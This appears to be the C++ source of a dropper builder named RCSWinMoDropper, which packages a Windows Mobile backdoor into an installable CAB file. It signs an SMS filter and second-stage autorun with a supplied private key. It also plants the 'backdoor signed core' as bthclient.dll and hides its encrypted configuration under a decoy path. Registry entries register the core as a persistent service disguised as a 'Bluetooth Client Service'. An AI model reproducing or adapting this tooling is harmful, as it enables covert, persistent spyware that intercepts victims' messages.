#include "stdafx.h"
#include <Windows.h>
#include "dropper.h"

extern BOOL SignMobileComponent(TCHAR *wsFile, TCHAR *wsCert);

int _tmain(int argc, _TCHAR* argv[])
{
	HANDLE hFile;
	BYTE *pBlockPtr	= NULL;
	WCHAR wsCoreFile[MAX_PATH];
	WCHAR wsSmsFile[MAX_PATH];
	WCHAR wsSecondFile[MAX_PATH];
	WCHAR wsConfigFile[MAX_PATH];
	WCHAR wsCertFile[MAX_PATH];
	WCHAR wsPFXFile[MAX_PATH];
	WCHAR wsOutFile[MAX_PATH];
	unsigned int iLen = 0;

	if (argc != 8) {
		printf("ERROR: \n");
		printf("  usage:  RCSWinMoDropper.exe  <core> <smsfilter> <secondstage> <config> <cert> <pfx> <output>\n\n");
		printf("  <core> is the backdoor signed core\n");
		printf("  <smsfilter> is the smsfilter dll\n");
		printf("  <secondstage> is the second stage autorun\n");
		printf("  <config> is the backdoor encrypted configuration\n");
		printf("  <cert> is the CA cert to be dropped\n");
		printf("  <pfx> is the private key for the signing process\n");
		printf("  <output> is the output file\n\n");
		return 0;
	}

	wsprintf(wsCoreFile, L"%s", argv[1]);
	wsprintf(wsSmsFile, L"%s", argv[2]);
	wsprintf(wsSecondFile, L"%s", argv[3]);
	wsprintf(wsConfigFile, L"%s", argv[4]);
	wsprintf(wsCertFile, L"%s", argv[5]);
	wsprintf(wsPFXFile, L"%s", argv[6]);
	wsprintf(wsOutFile, L"%s", argv[7]);

	/************************************************************************/
	/*  SANITY CHECKS                                                       */
	/************************************************************************/

	if ( (hFile = CreateFile(wsCoreFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL)) == INVALID_HANDLE_VALUE ) {
		printf("Cannot find Core file [%S]\n", wsCoreFile);
		return ERROR_EMBEDDING;
	} else {
		CloseHandle(hFile);
	}

	if ( (hFile = CreateFile(wsSmsFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL)) == INVALID_HANDLE_VALUE ) {
		printf("Cannot find SMS filter file [%S]\n", wsSmsFile);
		return ERROR_EMBEDDING;
	} else {
		CloseHandle(hFile);
	}

	if ( (hFile = CreateFile(wsSecondFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL)) == INVALID_HANDLE_VALUE ) {
		printf("Cannot find Second Stage file [%S]\n", wsSecondFile);
		return ERROR_EMBEDDING;
	} else {
		CloseHandle(hFile);
	}

	if ( (hFile = CreateFile(wsConfigFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL)) == INVALID_HANDLE_VALUE ) {
		printf("Cannot find Config file [%S]\n", wsConfigFile);
		return ERROR_EMBEDDING;
	} else {
		CloseHandle(hFile);
	}

	if ( (hFile = CreateFile(wsCertFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL)) == INVALID_HANDLE_VALUE ) {
		printf("Cannot find Cert file [%S]\n", wsCertFile);
		return ERROR_EMBEDDING;
	} else {
		CloseHandle(hFile);
	}

	if ( (hFile = CreateFile(wsPFXFile, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, NULL, NULL)) == INVALID_HANDLE_VALUE ) {
		printf("Cannot find PFX file [%S]\n", wsPFXFile);
		return ERROR_EMBEDDING;
	} else {
		CloseHandle(hFile);
	}

	/************************************************************************/
	/*  READY TO GO                                                         */
	/************************************************************************/

	printf("Ready to go...\n");
	printf("CORE          [%S]\n", wsCoreFile);
	printf("SMSFILTER     [%S]\n", wsSmsFile);
	printf("SECOND STAGE  [%S]\n", wsSecondFile);
	printf("CONFIG        [%S]\n", wsConfigFile);
	printf("CERT FILE     [%S]\n", wsCertFile);
	printf("OUTPUT        [%S]\n\n", wsOutFile);

	/************************************************************************/
	/* SIGNING                                                              */
	/************************************************************************/

	WCHAR wsDropPath[MAX_PATH];

	if (SignMobileComponent(wsSmsFile, wsPFXFile)) {
		printf("Using PFX to sign SMS filter... ok\n");
	} else {
		printf("Cannot sign with PFX file [%S]\n", wsPFXFile);
		return ERROR_EMBEDDING;
	}

	if (SignMobileComponent(wsSecondFile, wsPFXFile)) {
		printf("Using PFX to sign Second Stage... ok\n");
	} else {
		printf("Cannot sign with PFX file [%S]\n", wsPFXFile);
		return ERROR_EMBEDDING;
	}

	/************************************************************************/
	/* CAB GENERATION                                                       */
	/************************************************************************/

	wsprintf(wsDropPath, L"\\Windows\\autorun2.exe");

	if (AddFile(wsDropPath, wsSecondFile)) {
		printf("Adding Second Stage to cab... ok\n");
	} else {
		printf("Cannot add Second Stage to cab [%S]\n", wsSecondFile);
		return ERROR_EMBEDDING;
	}

	wsprintf(wsDropPath, L"\\Windows\\bthclient.dll");
	
	if (AddFile(wsDropPath, wsCoreFile)) {
		printf("Adding Core to cab... ok\n");
	} else {
		printf("Cannot add Core to cab [%S]\n", wsCoreFile);
		return ERROR_EMBEDDING;
	}
	
	wsprintf(wsDropPath, L"\\Windows\\SmsFilter.dll");

	if (AddFile(wsDropPath, wsSmsFile)) {
		printf("Adding SMS filter to cab... ok\n");
	} else {
		printf("Cannot add SMS filter to cab [%S]\n", wsSmsFile);
		return ERROR_EMBEDDING;
	}

	wsprintf(wsDropPath, L"\\Windows\\$MS313Mobile\\cptm511.dql");

	if (AddFile(wsDropPath, wsConfigFile)) {
		printf("Adding Config to cab... ok\n");
	} else {
		printf("Cannot add Config to cab [%S]\n", wsConfigFile);
		return ERROR_EMBEDDING;
	}

	wsprintf(wsDropPath, L"cert.cer");

	if (AddFile(wsDropPath, wsCertFile)) {
		printf("Adding Cert to cab... ok\n");
	} else {
		printf("Cannot add Cert to cab [%S]\n", wsCertFile);
		return ERROR_EMBEDDING;
	}

	WCHAR wsKeyPath[MAX_PATH];
	WCHAR wsDLL[MAX_PATH];
	WCHAR *wsCore = L"bthclient";
	BOOL ret = TRUE;

	// Add reg key to cabinet
	wsprintf(wsKeyPath, L"Services\\%s", wsCore);
	ret &= AddRegistryKey(HKEY_LOCAL_MACHINE, wsKeyPath);

	wsprintf(wsKeyPath, L"Services\\%s\\FriendlyName", wsCore);
	ret &= AddRegistryValue(HKEY_LOCAL_MACHINE, wsKeyPath, typeWString, (LPVOID)L"Bluetooth Client", 0);

	wsprintf(wsKeyPath, L"Services\\%s\\Dll", wsCore);
	wsprintf(wsDLL, L"%s.dll", wsCore);
	ret &= AddRegistryValue(HKEY_LOCAL_MACHINE, wsKeyPath, typeWString, (LPVOID)wsDLL, 0);

	wsprintf(wsKeyPath, L"Services\\%s\\Order", wsCore);
	ret &= AddRegistryValue(HKEY_LOCAL_MACHINE, wsKeyPath, typeDword, (LPVOID)9, 0);

	wsprintf(wsKeyPath, L"Services\\%s\\Index", wsCore);
	ret &= AddRegistryValue(HKEY_LOCAL_MACHINE, wsKeyPath, typeDword, (LPVOID)0, 0);

	wsprintf(wsKeyPath, L"Services\\%s\\Keep", wsCore);
	ret &= AddRegistryValue(HKEY_LOCAL_MACHINE, wsKeyPath, typeDword, (LPVOID)1, 0);

	wsprintf(wsKeyPath, L"Services\\%s\\Prefix", wsCore);
	ret &= AddRegistryValue(HKEY_LOCAL_MACHINE, wsKeyPath, typeWString, (LPVOID)L"BTC", 0);

	wsprintf(wsKeyPath, L"Services\\%s\\Description", wsCore);
	ret &= AddRegistryValue(HKEY_LOCAL_MACHINE, wsKeyPath, typeWString, (LPVOID)L"Bluetooth Client Service", 0);

	ret &= RegService(L"BTC", wsCore, 0);

	if (!ret) {
		printf("Cannot write registry informations\n");
		return ERROR_EMBEDDING;
	}

	if (CreateArchive(wsOutFile)) {
		printf("Output file... ok\n");
	} else {
		printf("Cannot create output file [%S]\n", wsOutFile);
		DeleteFile(wsOutFile);
		return ERROR_EMBEDDING;
	}

	return ERROR_SUCCESS;
}